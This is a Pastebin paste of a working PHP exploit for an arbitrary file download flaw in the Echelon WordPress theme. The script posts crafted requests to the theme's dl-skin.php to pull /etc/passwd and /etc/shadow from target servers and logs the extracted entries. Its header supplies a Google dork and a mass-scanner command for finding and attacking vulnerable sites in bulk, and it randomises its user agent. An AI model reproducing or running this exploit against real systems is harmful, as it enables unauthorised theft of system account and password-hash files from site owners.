SHARE
TWEET

[EXPLOIT] Wordpress A.F.D Theme Echelon

Googleinurl Dec 15th, 2014 (edited) 1,215 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2.  
  3. #===============================================================================
  4. # NAME:         Wordpress A.F.D Theme Echelon
  5. # TIPE:         Arbitrary File Download
  6. # Google DORK:  inurl:/wp-content/themes/echelon
  7. # Vendor:       www.wordpress.org
  8. # Tested on:    Linux
  9. # EXECUTE:      php exploit.php www.alvo.com.br
  10. # OUTPUT:       EXPLOIT_WPAFD_Echelon.txt
  11. # AUTOR:        Cleiton Pinheiro
  12. # Blog:         http://blog.inurl.com.br
  13. # Twitter:      https://twitter.com/googleinurl
  14. # Fanpage:      https://fb.com/InurlBrasil
  15. # GIT:          https://github.com/googleinurl
  16. # YOUTUBE       https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
  17. #
  18. #
  19. #------------------------------------------------------------------------------
  20. #  Comand Exec Scanner INURLBR:
  21. # ./inurlbr.php --dork 'inurl:/wp-content/themes/echelon' -q 1,6 -s save.txt --comand-all "php exploit.php _TARGET_"
  22. #
  23. #------------------------------------------------------------------------------
  24. # Download Scanner INURLBR:
  25. # https://github.com/googleinurl/SCANNER-INURLBR
  26. #===============================================================================
  27.  
  28. error_reporting(1);
  29. set_time_limit(0);
  30. ini_set('display_errors', 1);
  31. ini_set('max_execution_time', 0);
  32. ini_set('allow_url_fopen', 1);
  33. ob_implicit_flush(true);
  34. ob_end_flush();
  35. print empty($argv[1]) ? exit("0x[ERROR]: DEFINA URL / Execute: php exploit.php www.alvo.com.br\n") : NULL;
  36. $argv[1] = isset($argv[1]) && strstr($argv[1], 'http') ? $argv[1] : "http://{$argv[1]}";
  37. $config['line'] = "\n------------------------------------------------------------------------------------------------------------------\n";
  38. $config['alvo'] = $argv[1];
  39. $config['exploit'] = "/wp-content/themes/echelon/lib/scripts/dl-skin.php";
  40.  
  41. function __plus() {
  42.  
  43.     ob_flush();
  44.     flush();
  45. }
  46.  
  47. function __convertUrlQuery($query) {
  48.  
  49.     $queryParts = explode('&', $query);
  50.     $params = array();
  51.     foreach ($queryParts as $param) {
  52.         $item = explode('=', $param);
  53.         $params[$item[0]] = urlencode($item[1]);
  54.     }
  55.  
  56.     return $params;
  57. }
  58.  
  59. function __request_info($curl, $config) {
  60.     $postDados = __convertUrlQuery("_mysite_download_skin={$config['file']}&submit=Download");
  61.     foreach ($postDados as $campo => $valor) {
  62.         $postDados_format .= $campo . '=' . ($valor) . '&';
  63.     }
  64.  
  65.     $postDados_format = rtrim($postDados_format, '&');
  66.     curl_setopt($curl, CURLOPT_POST, count($postDados));
  67.     curl_setopt($curl, CURLOPT_POSTFIELDS, $postDados_format);
  68.     curl_setopt($curl, CURLOPT_URL, $config['alvo'] . $config['exploit']);
  69.     curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/' . rand(1, 20) . '.0(X11; Linux x8' . rand(1, 20) . '_6' . rand(1, 20) . ') blog.inurl.com.br/'. md5(rand(1, 200)) . '.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/'. rand(1, 500) . '.31');
  70.     curl_setopt($curl, CURLOPT_REFERER, $config['alvo'] .
  71.             $config['exploit']);
  72.     curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
  73.     curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
  74.     curl_setopt($curl, CURLOPT_HEADER, 1);
  75.     curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  76.     $corpo = curl_exec($curl);
  77.     $server = curl_getinfo($curl);
  78.     $status = NULL;
  79.     preg_match_all('(HTTP.*)', $corpo, $status['http']);
  80.     preg_match_all('(Server:.*)', $corpo, $status['server']);
  81.     preg_match_all('(Content-Disposition:.*)', $corpo, $status['Content-Disposition']);
  82.     $info = str_replace("\r", '', str_replace("\n", '', "{$status['http'][0][0]}, {$status['server'][0][0]}{$status['Content-Disposition'][0][0]}"));
  83.     curl_close($curl);
  84.     unset($curl);
  85.     return isset($corpo) ? array('corpo' => $corpo, 'server' => $server,'info' => $info) : FALSE;
  86. }
  87.  
  88. function main($config, $rest) {
  89.  
  90.     __plus();
  91.     print "0x " . date("h:m:s") . " [INFO][EXPLOITATION THE FILE]:{$config['file']}:\n";
  92.     preg_match_all("(root:.*)", $rest['corpo'], $final);
  93.     preg_match_all("(sbin:.*)", $rest['corpo'], $final__);
  94.     preg_match_all("(ftp:.*)", $rest['corpo'], $final___);
  95.     preg_match_all("(nobody:.*)", $rest['corpo'], $final____);
  96.     preg_match_all("(mail:.*)", $rest['corpo'], $final_____);
  97.     $_final = array_merge($final[0], $final__[0], $final___[0], $final____[0], $final_____[0]);
  98.     $res = NULL;
  99.     if (preg_match("#root#i", $rest['corpo'])) {
  100.         $res.= "0x " . date("h:m:s") . " [INFO][IS VULN][RESUME][VALUES]:\n";
  101.         $res.=$config['line'] . "\n";
  102.         foreach ($_final as $value) {
  103.             $res.="0x " . date("h:m:s") . " [VALUE]: $value\n";
  104.         }
  105.         $res.=$config['line'];
  106.         __plus();
  107.         file_put_contents('EXPLOIT_WPAFD_Echelon.txt', "{$config['alvo']}\n{$res}\n", FILE_APPEND);
  108.         print "{$res}[VALUES SAVED]: EXPLOIT_WPAFD_Echelon.txt\n\n";
  109.     } else {
  110.  
  111.         print "0x " . date("h:m:s") . " [INFO][NOT VULN]\n";
  112.     }
  113. }
  114.  
  115. print "\r\n0x[EXPLOIT NAME]: Wordpress A.F.D Theme Echelon / INURL - BRASIL\n";
  116. $config['file'] = '/etc/passwd';
  117. $rest = __request_info($objcurl = curl_init(), $config);
  118. __plus();
  119. print $line;
  120. print "0x " . date("h:m:s") . " [INFO]: {$rest['info']}\n";
  121. print "0x " . date("h:m:s") . " [INFO][TARGET]: {$config['alvo']}\n";
  122. main($config, $rest);
  123. __plus();
  124. $config['file'] = '/etc/shadow';
  125. $rest = __request_info($objcurl = curl_init(), $config);
  126. __plus();
  127. main($config, $rest);
  128. __plus();
RAW Paste Data
Top